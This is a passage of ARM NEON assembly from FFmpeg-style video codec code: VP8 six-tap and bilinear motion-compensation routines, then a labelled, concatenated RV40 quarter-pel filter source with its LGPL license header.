vtrn.32 q1, q2 @ interleave the two row sets
vtrn.32 d6, d7
vp8_epel8_v6_y2 d2, d3, d2, d4, d3, d5, d6, d7, d28
vst1.32 {d2[0]}, [r0,:32], r1 @ unpack the 4 result rows
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 2b
add sp, sp, #52+16 @ release scratch
pop {r4,pc}
endfunc
@ 4-wide 2D MC: horizontal 6-tap first pass, vertical 4-tap second.
@ Pass 1 stores h+3 4-byte rows into a stack scratch buffer; pass 2
@ transposes two interleaved row sets and filters 4 rows per iteration.
@ Stack args: h, mx, my (offsets per the ldr comments).
function ff_put_vp8_epel4_h6v4_neon, export=1
sub r2, r2, r3 @ src -= 1 row + 2 cols
sub r2, r2, #2
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #44+16 @ scratch: (h+3)*4 max + align slack
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #3 @ h+3 intermediate rows
bic lr, lr, #15 @ 16-align scratch pointer
1:
vld1.8 {q1}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.32 {d2[0]}, [lr,:32]!
subs r12, r12, #1
bne 1b
ldr r4, [sp, #44+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #44+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15 @ rewound, re-aligned scratch
2:
vld1.8 {d2-d3}, [lr,:128]! @ rows 0..4 (first set)
vld1.32 {d6[]}, [lr,:32]
sub lr, lr, #8 @ back up to row 2
vld1.8 {d4-d5}, [lr]! @ rows 2..6 (second set)
vld1.32 {d6[1]}, [lr,:32]
sub lr, lr, #8 @ advance scratch by 4 rows
vtrn.32 q1, q2 @ interleave the two row sets
vp8_epel8_v4_y2 d2, d3, d2, d4, d3, d5, d6
vst1.32 {d2[0]}, [r0,:32], r1 @ unpack the 4 result rows
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 2b
add sp, sp, #44+16 @ release scratch
pop {r4,pc}
endfunc
@ 4-wide horizontal 4-tap subpel MC (uses the 8-wide filter, stores
@ only the low 4 pixels).
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and mx on the stack (offsets per the ldr comments).
function ff_put_vp8_epel4_h4_neon, export=1
sub r2, r2, #1 @ src -= 1 (4-tap reach)
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
vld1.8 {d2}, [r2], r3
vp8_epel8_h4 d2, d2, d2
vst1.32 {d2[0]}, [r0,:32], r1 @ store low 4 pixels only
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
@ 4-wide vertical 4-tap subpel MC; four output rows per iteration by
@ packing two 4-pixel rows into each d register lane pair.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and my on the stack (offsets per the ldr comments).
function ff_put_vp8_epel4_v4_neon, export=1
sub r2, r2, r3 @ src -= 1 row (4-tap reach)
push {r4,lr}
ldr r4, [sp, #16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128] @ filter coefficients -> q0
1:
vld1.32 {d2[]}, [r2], r3 @ rows 0..4 into lane 0
vld1.32 {d3[]}, [r2], r3
vld1.32 {d4[]}, [r2], r3
vld1.32 {d5[]}, [r2], r3
vld1.32 {d6[]}, [r2]
sub r2, r2, r3, lsl #1 @ rewind to row 2
vld1.32 {d2[1]}, [r2], r3 @ rows 2..6 into lane 1
vld1.32 {d3[1]}, [r2], r3
vld1.32 {d4[1]}, [r2], r3
vld1.32 {d5[1]}, [r2], r3
vld1.32 {d6[1]}, [r2]
sub r2, r2, r3, lsl #1
vp8_epel8_v4_y2 d2, d3, d2, d3, d4, d5, d6
vst1.32 {d2[0]}, [r0,:32], r1 @ unpack the 4 result rows
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 1b
pop {r4,pc}
endfunc
@ 4-wide 2D (horizontal 4-tap then vertical 4-tap) subpel MC.
@ Pass 1 stores h+3 4-byte rows into a stack scratch buffer; pass 2
@ transposes two interleaved row sets and filters 4 rows per iteration.
@ Stack args: h, mx, my (offsets per the ldr comments).
function ff_put_vp8_epel4_h4v4_neon, export=1
sub r2, r2, r3 @ src -= 1 row + 1 col
sub r2, r2, #1
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #44+16 @ scratch + align slack
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #3 @ h+3 intermediate rows
bic lr, lr, #15 @ 16-align scratch pointer
1:
vld1.8 {d2}, [r2], r3
vp8_epel8_h4 d2, d2, d3
vst1.32 {d2[0]}, [lr,:32]!
subs r12, r12, #1
bne 1b
ldr r4, [sp, #44+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #44+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15 @ rewound, re-aligned scratch
2:
vld1.8 {d2-d3}, [lr,:128]! @ rows 0..4 (first set)
vld1.32 {d6[]}, [lr,:32]
sub lr, lr, #8 @ back up to row 2
vld1.8 {d4-d5}, [lr]! @ rows 2..6 (second set)
vld1.32 {d6[1]}, [lr,:32]
sub lr, lr, #8 @ advance scratch by 4 rows
vtrn.32 q1, q2 @ interleave the two row sets
vp8_epel8_v4_y2 d2, d3, d2, d4, d3, d5, d6
vst1.32 {d2[0]}, [r0,:32], r1 @ unpack the 4 result rows
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 2b
add sp, sp, #44+16 @ release scratch
pop {r4,pc}
endfunc
@ VP8 6-tap subpel filter coefficient table, one 8-entry row per
@ fractional position 1..7 (position 0 needs no filtering); taps 1 and
@ 4 are applied with vmls, the rest with vmla/vmul.
@ note: worst case sum of all 6-tap filter values * 255 is 0x7f80 so 16 bit
@ arithmetic can be used to apply filters
const subpel_filters, align=4
.short 0, 6, 123, 12, 1, 0, 0, 0
.short 2, 11, 108, 36, 8, 1, 0, 0
.short 0, 9, 93, 50, 6, 0, 0, 0
.short 3, 16, 77, 77, 16, 3, 0, 0
.short 0, 6, 50, 93, 9, 0, 0, 0
.short 1, 8, 36, 108, 11, 2, 0, 0
.short 0, 1, 12, 123, 6, 0, 0, 0
endconst
/* Bilinear MC */
@ 16-wide horizontal bilinear MC:
@ dst[x] = (src[x]*(8-mx) + src[x+1]*mx + 4) >> 3, two rows/iteration.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and mx on the stack (offsets per the ldr comments).
function ff_put_vp8_bilin16_h_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12 @ d0 = mx
rsb r12, r12, #8
vdup.8 d1, r12 @ d1 = 8 - mx
ldr r12, [sp] @ h
1:
subs r12, r12, #2
vld1.8 {d2-d4}, [r2], r3 @ row 0: 17+ source bytes
vext.8 q2, q1, q2, #1 @ src[x+1]
vmull.u8 q8, d2, d1
vmlal.u8 q8, d4, d0
vld1.8 {d18-d20},[r2], r3 @ row 1
vmull.u8 q3, d3, d1
vmlal.u8 q3, d5, d0
vext.8 q10, q9, q10, #1
vmull.u8 q11, d18, d1
vmlal.u8 q11, d20, d0
vmull.u8 q12, d19, d1
vmlal.u8 q12, d21, d0
vrshrn.u16 d4, q8, #3 @ round and >>3
vrshrn.u16 d5, q3, #3
vrshrn.u16 d6, q11, #3
vrshrn.u16 d7, q12, #3
vst1.8 {q2}, [r0,:128], r1
vst1.8 {q3}, [r0,:128], r1
bgt 1b
bx lr
endfunc
@ 16-wide vertical bilinear MC:
@ dst[y] = (src[y]*(8-my) + src[y+1]*my + 4) >> 3, two rows/iteration;
@ the last loaded row is kept in q1 for the next iteration.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and my on the stack (offsets per the ldr comments).
function ff_put_vp8_bilin16_v_neon, export=1
ldr r12, [sp, #8] @ my
vdup.8 d0, r12 @ d0 = my
rsb r12, r12, #8
vdup.8 d1, r12 @ d1 = 8 - my
ldr r12, [sp] @ h
vld1.8 {q1}, [r2], r3 @ prime with row 0
1:
subs r12, r12, #2
vld1.8 {q2}, [r2], r3
vmull.u8 q3, d2, d1
vmlal.u8 q3, d4, d0
vmull.u8 q8, d3, d1
vmlal.u8 q8, d5, d0
vld1.8 {q1}, [r2], r3 @ q1 carries over to next pass
vmull.u8 q9, d4, d1
vmlal.u8 q9, d2, d0
vmull.u8 q10, d5, d1
vmlal.u8 q10, d3, d0
vrshrn.u16 d4, q3, #3 @ round and >>3
vrshrn.u16 d5, q8, #3
vrshrn.u16 d6, q9, #3
vrshrn.u16 d7, q10, #3
vst1.8 {q2}, [r0,:128], r1
vst1.8 {q3}, [r0,:128], r1
bgt 1b
bx lr
endfunc
@ 16-wide 2D bilinear MC: horizontal blend by mx (d0/d1), then
@ vertical blend by my (d2/d3); the previous horizontally-filtered
@ row is carried in q2 between iterations. Two rows per iteration.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h, mx, my on the stack (offsets per the ldr comments).
function ff_put_vp8_bilin16_hv_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12 @ d0 = mx
rsb r12, r12, #8
vdup.8 d1, r12 @ d1 = 8 - mx
ldr r12, [sp, #8] @ my
vdup.8 d2, r12 @ d2 = my
rsb r12, r12, #8
vdup.8 d3, r12 @ d3 = 8 - my
ldr r12, [sp] @ h
@ prime: horizontally filter row 0 into q2
vld1.8 {d4-d6}, [r2], r3
vext.8 q3, q2, q3, #1
vmull.u8 q8, d4, d1
vmlal.u8 q8, d6, d0
vmull.u8 q9, d5, d1
vmlal.u8 q9, d7, d0
vrshrn.u16 d4, q8, #3
vrshrn.u16 d5, q9, #3
1:
subs r12, r12, #2
vld1.8 {d18-d20},[r2], r3 @ horizontal pass, row n+1
vext.8 q10, q9, q10, #1
vmull.u8 q11, d18, d1
vmlal.u8 q11, d20, d0
vld1.8 {d26-d28},[r2], r3 @ horizontal pass, row n+2
vmull.u8 q12, d19, d1
vmlal.u8 q12, d21, d0
vext.8 q14, q13, q14, #1
vmull.u8 q8, d26, d1
vmlal.u8 q8, d28, d0
vmull.u8 q9, d27, d1
vmlal.u8 q9, d29, d0
vrshrn.u16 d6, q11, #3 @ q3 = h-filtered row n+1
vrshrn.u16 d7, q12, #3
vmull.u8 q12, d4, d3 @ vertical blend rows n, n+1
vmlal.u8 q12, d6, d2
vmull.u8 q15, d5, d3
vmlal.u8 q15, d7, d2
vrshrn.u16 d4, q8, #3 @ q2 = h-filtered row n+2
vrshrn.u16 d5, q9, #3
vmull.u8 q10, d6, d3 @ vertical blend rows n+1, n+2
vmlal.u8 q10, d4, d2
vmull.u8 q11, d7, d3
vmlal.u8 q11, d5, d2
vrshrn.u16 d24, q12, #3
vrshrn.u16 d25, q15, #3
vst1.8 {q12}, [r0,:128], r1
vrshrn.u16 d20, q10, #3
vrshrn.u16 d21, q11, #3
vst1.8 {q10}, [r0,:128], r1
bgt 1b
bx lr
endfunc
@ 8-wide horizontal bilinear MC, two rows per iteration:
@ dst[x] = (src[x]*(8-mx) + src[x+1]*mx + 4) >> 3.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and mx on the stack (offsets per the ldr comments).
function ff_put_vp8_bilin8_h_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12 @ d0 = mx
rsb r12, r12, #8
vdup.8 d1, r12 @ d1 = 8 - mx
ldr r12, [sp] @ h
1:
subs r12, r12, #2
vld1.8 {q1}, [r2], r3
vext.8 d3, d2, d3, #1 @ src[x+1]
vmull.u8 q2, d2, d1
vmlal.u8 q2, d3, d0
vld1.8 {q3}, [r2], r3
vext.8 d7, d6, d7, #1
vmull.u8 q8, d6, d1
vmlal.u8 q8, d7, d0
vrshrn.u16 d4, q2, #3 @ round and >>3
vrshrn.u16 d16, q8, #3
vst1.8 {d4}, [r0,:64], r1
vst1.8 {d16}, [r0,:64], r1
bgt 1b
bx lr
endfunc
@ 8-wide vertical bilinear MC, two rows per iteration; the last
@ loaded row stays in d2 for the next iteration.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and my on the stack (offsets per the ldr comments).
function ff_put_vp8_bilin8_v_neon, export=1
ldr r12, [sp, #8] @ my
vdup.8 d0, r12 @ d0 = my
rsb r12, r12, #8
vdup.8 d1, r12 @ d1 = 8 - my
ldr r12, [sp] @ h
vld1.8 {d2}, [r2], r3 @ prime with row 0
1:
subs r12, r12, #2
vld1.8 {d3}, [r2], r3
vmull.u8 q2, d2, d1
vmlal.u8 q2, d3, d0
vld1.8 {d2}, [r2], r3 @ d2 carries over to next pass
vmull.u8 q3, d3, d1
vmlal.u8 q3, d2, d0
vrshrn.u16 d4, q2, #3 @ round and >>3
vrshrn.u16 d6, q3, #3
vst1.8 {d4}, [r0,:64], r1
vst1.8 {d6}, [r0,:64], r1
bgt 1b
bx lr
endfunc
@ 8-wide 2D bilinear MC: horizontal blend by mx, vertical blend by my;
@ the previous horizontally-filtered row is carried in d22.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h, mx, my on the stack (offsets per the ldr comments).
function ff_put_vp8_bilin8_hv_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12 @ d0 = mx
rsb r12, r12, #8
vdup.8 d1, r12 @ d1 = 8 - mx
ldr r12, [sp, #8] @ my
vdup.8 d2, r12 @ d2 = my
rsb r12, r12, #8
vdup.8 d3, r12 @ d3 = 8 - my
ldr r12, [sp] @ h
@ prime: horizontally filter row 0 into d22
vld1.8 {q2}, [r2], r3
vext.8 d5, d4, d5, #1
vmull.u8 q9, d4, d1
vmlal.u8 q9, d5, d0
vrshrn.u16 d22, q9, #3
1:
subs r12, r12, #2
vld1.8 {q3}, [r2], r3 @ horizontal pass, row n+1
vext.8 d7, d6, d7, #1
vmull.u8 q8, d6, d1
vmlal.u8 q8, d7, d0
vld1.8 {q2}, [r2], r3 @ horizontal pass, row n+2
vext.8 d5, d4, d5, #1
vmull.u8 q9, d4, d1
vmlal.u8 q9, d5, d0
vrshrn.u16 d16, q8, #3 @ h-filtered row n+1
vmull.u8 q10, d22, d3 @ vertical blend rows n, n+1
vmlal.u8 q10, d16, d2
vrshrn.u16 d22, q9, #3 @ h-filtered row n+2 (carried over)
vmull.u8 q12, d16, d3 @ vertical blend rows n+1, n+2
vmlal.u8 q12, d22, d2
vrshrn.u16 d20, q10, #3
vst1.8 {d20}, [r0,:64], r1
vrshrn.u16 d23, q12, #3
vst1.8 {d23}, [r0,:64], r1
bgt 1b
bx lr
endfunc
@ 4-wide horizontal bilinear MC; two rows packed into one d register
@ pair via vtrn so a single 8-wide multiply covers both.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and mx on the stack (offsets per the ldr comments).
function ff_put_vp8_bilin4_h_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12 @ d0 = mx
rsb r12, r12, #8
vdup.8 d1, r12 @ d1 = 8 - mx
ldr r12, [sp] @ h
1:
subs r12, r12, #2
vld1.8 {d2}, [r2], r3
vext.8 d3, d2, d3, #1 @ src[x+1], row 0
vld1.8 {d6}, [r2], r3
vext.8 d7, d6, d7, #1 @ src[x+1], row 1
vtrn.32 q1, q3 @ pack both rows into d2/d3
vmull.u8 q2, d2, d1
vmlal.u8 q2, d3, d0
vrshrn.u16 d4, q2, #3 @ round and >>3
vst1.32 {d4[0]}, [r0,:32], r1
vst1.32 {d4[1]}, [r0,:32], r1
bgt 1b
bx lr
endfunc
@ 4-wide vertical bilinear MC; consecutive rows are packed into
@ d-register lanes so one multiply produces two output rows.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h and my on the stack (offsets per the ldr comments).
function ff_put_vp8_bilin4_v_neon, export=1
ldr r12, [sp, #8] @ my
vdup.8 d0, r12 @ d0 = my
rsb r12, r12, #8
vdup.8 d1, r12 @ d1 = 8 - my
ldr r12, [sp] @ h
vld1.32 {d2[]}, [r2], r3 @ prime with row 0
1:
vld1.32 {d3[]}, [r2] @ rows n+1, n+2 into lanes
vld1.32 {d2[1]}, [r2], r3
vld1.32 {d3[1]}, [r2], r3
vmull.u8 q2, d2, d1
vmlal.u8 q2, d3, d0
vtrn.32 d3, d2 @ carry last row into d2 lane 0
vrshrn.u16 d4, q2, #3 @ round and >>3
vst1.32 {d4[0]}, [r0,:32], r1
vst1.32 {d4[1]}, [r0,:32], r1
subs r12, r12, #2
bgt 1b
bx lr
endfunc
@ 4-wide 2D bilinear MC: horizontal blend by mx, then vertical blend
@ by my; the previous h-filtered row is carried in d22 lanes.
@ r0 = dst, r1 = dst stride, r2 = src, r3 = src stride;
@ h, mx, my on the stack (offsets per the ldr comments).
function ff_put_vp8_bilin4_hv_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12 @ d0 = mx
rsb r12, r12, #8
vdup.8 d1, r12 @ d1 = 8 - mx
ldr r12, [sp, #8] @ my
vdup.8 d2, r12 @ d2 = my
rsb r12, r12, #8
vdup.8 d3, r12 @ d3 = 8 - my
ldr r12, [sp] @ h
@ prime: horizontally filter row 0 into d22
vld1.8 {d4}, [r2], r3
vext.8 d5, d4, d4, #1
vmull.u8 q9, d4, d1
vmlal.u8 q9, d5, d0
vrshrn.u16 d22, q9, #3
1:
subs r12, r12, #2
vld1.8 {d6}, [r2], r3 @ rows n+1 and n+2
vext.8 d7, d6, d6, #1
vld1.8 {d4}, [r2], r3
vext.8 d5, d4, d4, #1
vtrn.32 q3, q2 @ pack both rows into d6/d7
vmull.u8 q8, d6, d1 @ horizontal pass for both rows
vmlal.u8 q8, d7, d0
vrshrn.u16 d16, q8, #3
vmull.u8 q10, d16, d2 @ vertical blend with previous rows
vtrn.32 d22, d16
vmlal.u8 q10, d22, d3
vrev64.32 d22, d16 @ carry last h-filtered row over
vrshrn.u16 d20, q10, #3
vst1.32 {d20[0]}, [r0,:32], r1
vst1.32 {d20[1]}, [r0,:32], r1
bgt 1b
bx lr
endfunc
@ ---------------------------------------------------------------------
@ End of vp8dsp_neon.S.  The following code is a separate source file
@ concatenated here: ffmpeg-3.0.2/libavcodec/arm/rv40dsp_neon.S
@ (repo: Akagi201/ffmpeg-xcode, 34226 bytes)
@ ---------------------------------------------------------------------
/*
* Copyright (c) 2011 Janne Grunau <janne-libav@jannau.net>
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#include "neon.S"
@ RV40 qpel low-pass filter on one 8-pixel row spanning \r0:\r1:
@   out = satu8((src[-2] + src[3] - 5*(src[-1] + src[2])
@                + \rc1*src[0] + \rc2*src[1]) >> \shift)   (rounded)
@ \r0 holds bytes starting at src[-2]; vext extracts the shifted taps.
@ Result replaces \r0.  Clobbers q8, q9, q12 and d26-d28.
.macro qpel_lowpass r0, r1, rc1, rc2, shift
vext.8 d25, \r0, \r1, #1 @ src[-1]
vext.8 d26, \r0, \r1, #4 @ src[ 2]
vext.8 d24, \r0, \r1, #5 @ src[ 3]
vaddl.u8 q9, d25, d26 @ src[-1] + src[2]
vaddl.u8 q8, \r0, d24 @ src[-2] + src[3]
vext.8 d27, \r0, \r1, #2 @ src[ 0]
vshl.s16 q12, q9, #2
vsub.s16 q8, q8, q9 @ q8 -= 5 * (src[-1] + src[2])
vext.8 d28, \r0, \r1, #3 @ src[ 1]
vsub.s16 q8, q8, q12
vmlal.u8 q8, d27, \rc1 @ + rc1 * src[0]
vmlal.u8 q8, d28, \rc2 @ + rc2 * src[1]
vqrshrun.s16 \r0, q8, #\shift @ round, shift, saturate to u8
.endm
@ Same filter as qpel_lowpass, applied to two independent rows
@ (\r0:\r1 and \r2:\r3) with the instruction streams interleaved for
@ better dual-issue.  Results replace \r0 and \r2.
@ Clobbers q8-q10, q12, q13, d22, d28, d29 (and \r1, which is reused
@ as a temporary for the second row).
.macro qpel_lowpass_x2 r0, r1, r2, r3, rc1, rc2, shift
vext.8 d25, \r0, \r1, #1 @ src[-1]
vext.8 d26, \r0, \r1, #4 @ src[ 2]
vext.8 d24, \r0, \r1, #5 @ src[ 3]
vaddl.u8 q9, d25, d26
vaddl.u8 q8, \r0, d24
vext.8 d29, \r0, \r1, #2 @ src[ 0]
vext.8 d28, \r0, \r1, #3 @ src[ 1]
vshl.s16 q10, q9, #2
vext.8 \r1, \r2, \r3, #1 @ src[-1]
vsub.s16 q8, q8, q9
vext.8 d22, \r2, \r3, #4 @ src[ 2]
vext.8 \r0, \r2, \r3, #5 @ src[ 3]
vaddl.u8 q13, \r1, d22
vaddl.u8 q12, \r2, \r0
vsub.s16 q8, q8, q10
vshl.s16 q9, q13, #2
vsub.s16 q12, q12, q13
vmlal.u8 q8, d29, \rc1
vmlal.u8 q8, d28, \rc2
vsub.s16 q12, q12, q9
vext.8 d26, \r2, \r3, #2 @ src[ 0]
vext.8 d27, \r2, \r3, #3 @ src[ 1]
vmlal.u8 q12, d26, \rc1
vmlal.u8 q12, d27, \rc2
vqrshrun.s16 \r0, q8, #\shift
vqrshrun.s16 \r2, q12, #\shift
.endm
@ Emits put_rv40_qpel8_h_lp_packed_s\shift\()_neon:
@ horizontal low-pass over an 8-wide column, r3+1 rows total.
@ In:  r1 = src (advanced by stride r2), r3 = even row count,
@      r12 = packed destination, d0/d1 = centre-tap coefficients.
@ Writes r3+1 consecutive 8-byte rows at r12; the extra trailing row
@ supplies lookahead for a following vertical pass.
.macro rv40_qpel8_h shift
function put_rv40_qpel8_h_lp_packed_s\shift\()_neon
1:
vld1.8 {q2}, [r1], r2
vld1.8 {q3}, [r1], r2
qpel_lowpass_x2 d4, d5, d6, d7, d0, d1, \shift
vst1.8 {d4}, [r12,:64]!
vst1.8 {d6}, [r12,:64]!
subs r3, r3, #2
bgt 1b
@ one extra row beyond the loop count (vertical-pass lookahead)
vld1.8 {q2}, [r1]
qpel_lowpass d4, d5, d0, d1, \shift
vst1.8 {d4}, [r12,:64]!
bx lr
endfunc
.endm
@ Emits \type\()_rv40_qpel8_v_lp_packed_s\shift\()_neon:
@ vertical low-pass producing an 8x8 block from 13 packed 8-byte rows
@ at r1.  The rows are transposed so the horizontal lowpass macro can
@ be reused column-wise, then transposed back.  d15/d30/d31 enter the
@ second transpose uninitialised; the filter only reads the 13 valid
@ bytes of each transposed column (vext offsets reach index 12 only),
@ so the garbage lanes are never used.
@ In:  r0 = dst (stride r2), r1 = packed src (advanced),
@      d0/d1 = centre-tap coefficients.
@ The avg variant averages the result with the existing dst pixels.
.macro rv40_qpel8_v shift, type
function \type\()_rv40_qpel8_v_lp_packed_s\shift\()_neon
vld1.64 {d2}, [r1,:64]!
vld1.64 {d3}, [r1,:64]!
vld1.64 {d4}, [r1,:64]!
vld1.64 {d5}, [r1,:64]!
vld1.64 {d6}, [r1,:64]!
vld1.64 {d7}, [r1,:64]!
vld1.64 {d8}, [r1,:64]!
vld1.64 {d9}, [r1,:64]!
vld1.64 {d10}, [r1,:64]!
vld1.64 {d11}, [r1,:64]!
vld1.64 {d12}, [r1,:64]!
vld1.64 {d13}, [r1,:64]!
vld1.64 {d14}, [r1,:64]!
transpose_8x8 d2, d3, d4, d5, d6, d7, d8, d9
transpose_8x8 d10, d11, d12, d13, d14, d15, d30, d31
@ filter each pair of columns vertically (now laid out horizontally)
qpel_lowpass_x2 d2, d10, d3, d11, d0, d1, \shift
qpel_lowpass_x2 d4, d12, d5, d13, d0, d1, \shift
qpel_lowpass_x2 d6, d14, d7, d15, d0, d1, \shift
qpel_lowpass_x2 d8, d30, d9, d31, d0, d1, \shift
transpose_8x8 d2, d3, d4, d5, d6, d7, d8, d9
.ifc \type,avg
@ average with the 8 existing destination rows
vld1.64 d12, [r0,:64], r2
vld1.64 d13, [r0,:64], r2
vld1.64 d14, [r0,:64], r2
vld1.64 d15, [r0,:64], r2
vld1.64 d16, [r0,:64], r2
vld1.64 d17, [r0,:64], r2
vld1.64 d18, [r0,:64], r2
vld1.64 d19, [r0,:64], r2
sub r0, r0, r2, lsl #3 @ rewind dst 8 rows
vrhadd.u8 q1, q1, q6
vrhadd.u8 q2, q2, q7
vrhadd.u8 q3, q3, q8
vrhadd.u8 q4, q4, q9
.endif
vst1.64 d2, [r0,:64], r2
vst1.64 d3, [r0,:64], r2
vst1.64 d4, [r0,:64], r2
vst1.64 d5, [r0,:64], r2
vst1.64 d6, [r0,:64], r2
vst1.64 d7, [r0,:64], r2
vst1.64 d8, [r0,:64], r2
vst1.64 d9, [r0,:64], r2
bx lr
endfunc
.endm
@ Instantiate the horizontal pass for both rounding shifts used by
@ RV40 (>>5 and >>6); the mcXY functions below pick one per position.
rv40_qpel8_h 5
rv40_qpel8_h 6
@ Expands the full family of ff_\type\()_rv40_qpel{8,16}_mcXY_neon
@ motion-compensation functions for \type = put or avg.
@ Common ABI: r0 = dst, r1 = src, r2 = stride.
@ mcXY = quarter-pel position (X horizontal, Y vertical).  d0/d1 hold
@ the two centre-tap weights (52/20 or 20/20 or 20/52) selecting the
@ quarter-pel phase.  Mixed positions run the horizontal pass into an
@ 8-byte-aligned scratch buffer on the stack, then the vertical pass
@ reads it back.
.macro rv40_qpel type
function \type\()_rv40_qpel8_h_lowpass_neon
.ifc \type,avg
mov r12, r0
.endif
1:
vld1.8 {q2}, [r1], r2
vld1.8 {q3}, [r1], r2
qpel_lowpass_x2 d4, d5, d6, d7, d0, d1, 6
.ifc \type,avg
vld1.8 {d3}, [r12,:64], r2
vld1.8 {d16}, [r12,:64], r2
vrhadd.u8 d4, d4, d3
vrhadd.u8 d6, d6, d16
.endif
vst1.8 {d4}, [r0,:64], r2
vst1.8 {d6}, [r0,:64], r2
subs r3, r3, #2
bgt 1b
bx lr
endfunc
@ vertical-only lowpass reading 13 strided source rows directly
function \type\()_rv40_qpel8_v_lowpass_neon
vld1.64 {d2}, [r1], r2
vld1.64 {d3}, [r1], r2
vld1.64 {d4}, [r1], r2
vld1.64 {d5}, [r1], r2
vld1.64 {d6}, [r1], r2
vld1.64 {d7}, [r1], r2
vld1.64 {d8}, [r1], r2
vld1.64 {d9}, [r1], r2
vld1.64 {d10}, [r1], r2
vld1.64 {d11}, [r1], r2
vld1.64 {d12}, [r1], r2
vld1.64 {d13}, [r1], r2
vld1.64 {d14}, [r1]
transpose_8x8 d2, d3, d4, d5, d6, d7, d8, d9
transpose_8x8 d10, d11, d12, d13, d14, d15, d30, d31
qpel_lowpass_x2 d2, d10, d3, d11, d0, d1, 6
qpel_lowpass_x2 d4, d12, d5, d13, d0, d1, 6
qpel_lowpass_x2 d6, d14, d7, d15, d0, d1, 6
qpel_lowpass_x2 d8, d30, d9, d31, d0, d1, 6
transpose_8x8 d2, d3, d4, d5, d6, d7, d8, d9
.ifc \type,avg
vld1.64 d12, [r0,:64], r2
vld1.64 d13, [r0,:64], r2
vld1.64 d14, [r0,:64], r2
vld1.64 d15, [r0,:64], r2
vld1.64 d16, [r0,:64], r2
vld1.64 d17, [r0,:64], r2
vld1.64 d18, [r0,:64], r2
vld1.64 d19, [r0,:64], r2
sub r0, r0, r2, lsl #3
vrhadd.u8 q1, q1, q6
vrhadd.u8 q2, q2, q7
vrhadd.u8 q3, q3, q8
vrhadd.u8 q4, q4, q9
.endif
vst1.64 d2, [r0,:64], r2
vst1.64 d3, [r0,:64], r2
vst1.64 d4, [r0,:64], r2
vst1.64 d5, [r0,:64], r2
vst1.64 d6, [r0,:64], r2
vst1.64 d7, [r0,:64], r2
vst1.64 d8, [r0,:64], r2
vst1.64 d9, [r0,:64], r2
bx lr
endfunc
rv40_qpel8_v 5, \type
rv40_qpel8_v 6, \type
@ horizontal-only positions: src[-2] offset, height 8
function ff_\type\()_rv40_qpel8_mc10_neon, export=1
sub r1, r1, #2
mov r3, #8
vmov.i8 d0, #52
vmov.i8 d1, #20
b \type\()_rv40_qpel8_h_lowpass_neon
endfunc
function ff_\type\()_rv40_qpel8_mc30_neon, export=1
sub r1, r1, #2
mov r3, #8
vmov.i8 d0, #20
vmov.i8 d1, #52
b \type\()_rv40_qpel8_h_lowpass_neon
endfunc
@ vertical-only positions: src starts 2 rows up
function ff_\type\()_rv40_qpel8_mc01_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub r1, r1, r2, lsl #1
vmov.i8 d0, #52
